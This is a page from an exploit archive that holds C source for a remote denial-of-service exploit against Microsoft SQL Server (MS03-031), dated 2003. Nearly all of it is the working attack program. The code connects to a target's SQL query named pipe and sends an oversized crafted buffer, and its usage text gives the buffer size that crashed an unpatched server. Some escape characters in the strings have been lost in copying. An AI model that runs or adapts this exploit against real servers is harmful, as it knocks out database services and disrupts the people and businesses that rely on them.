MS Windows SQL Server Denial of Service Remote Exploit (MS03-031)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows SQL Server Denial of Service Remote Exploit (MS03-031)
# Published : 2003-07-25
# Author : refdom
# Previous Title : Linux Kernel <= 2.4.20 decode_fh Denial of Service Exploit
# Next Title : Cisco IOS IPv4 Packet Denial of Service Exploit (cisco-bug-44020.c)

////////////////////////////////////////////////////////////////
//      
//      Microsoft SQL Server DoS Remote Exploit (MS03-031)
//                    By refdom of xfocus
//    
////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>


void Usage()
{
	printf("******************************************n");
	printf("exp for Microsoft SQL Server DoS(MS03-031)nn");
	printf("t Written by Refdomn");
	printf("t Email: refdom xfocus orgn");
	printf("t Homepage: www.xfocus.orgnn");
	printf("Usage: DOSMSSQL.exe server buffersizen");
	printf("eg: DOSMSSQL.exe192.168.0.1 9000nn");
	printf("The buffersize depends on service pack level.n");
	printf("I test it on my server: windows 2000, mssqlserver no sp.n");
	printf("when buffersize is 9000, the server can be crashed.n");
	printf("n");
	printf("*******************************************nn");
}


int main(int argc, char* argv[])
{
	char lpPipeName[50];
	char *lpBuffer = NULL;
	unsigned long ulSize = 0;

	BOOL bResult;
	DWORD dwWritten = 0, dwMode;
	HANDLE hPipe;

	Usage();

	printf("Starting...n");

	if (argc != 3)
		goto Exit0;
	
	if (strlen(argv[1]) < 20)
	{
		sprintf(lpPipeName, "\\%s\\.\pipe\sql\query", argv[1]);
	}
	else
	{
		printf("Error!servern");
		goto Exit0;
	}

	ulSize= atol(argv[2]);

	lpBuffer = (char*)malloc(ulSize + 2);
	if (NULL == lpBuffer)
	{
		printf("malloc error!n");
		goto Exit0;
	}

	memset(lpBuffer, 0, ulSize + 2);
	memset(lpBuffer, 'A', ulSize);
	*lpBuffer = 'x12';
	*(lpBuffer + 1) = 'x01';
	*(lpBuffer + 2) = 'x00';
	
	printf("Connecting Server...n");

	hPipe = CreateFile(lpPipeName, 
					GENERIC_READ | GENERIC_WRITE,
					0,
					NULL,
					OPEN_EXISTING,
					0,
					NULL);
	if (INVALID_HANDLE_VALUE == hPipe)
	{
		printf("Error!Connect server!%dn", GetLastError());
		goto Exit0;
	}

   dwMode = PIPE_READMODE_MESSAGE; 
   bResult = SetNamedPipeHandleState( 
      hPipe,    // pipe handle 
      &dwMode,  // new pipe mode 
      NULL,     // don't set maximum bytes 
      NULL);    // don't set maximum time 
   if (!bResult)
   {
		printf("Error!SetNamedPipeHandleState.%dn", GetLastError());
		goto Exit0;
   }

	bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

	if (!bResult)
	{
		printf("ntError!WriteFile.%dnn", GetLastError());
		printf("When see the error message, the target may be crashed!!nn");
		goto Exit0;
	}

Exit0:
	
	return 0;
}

// www.Syue.com [2003-07-25]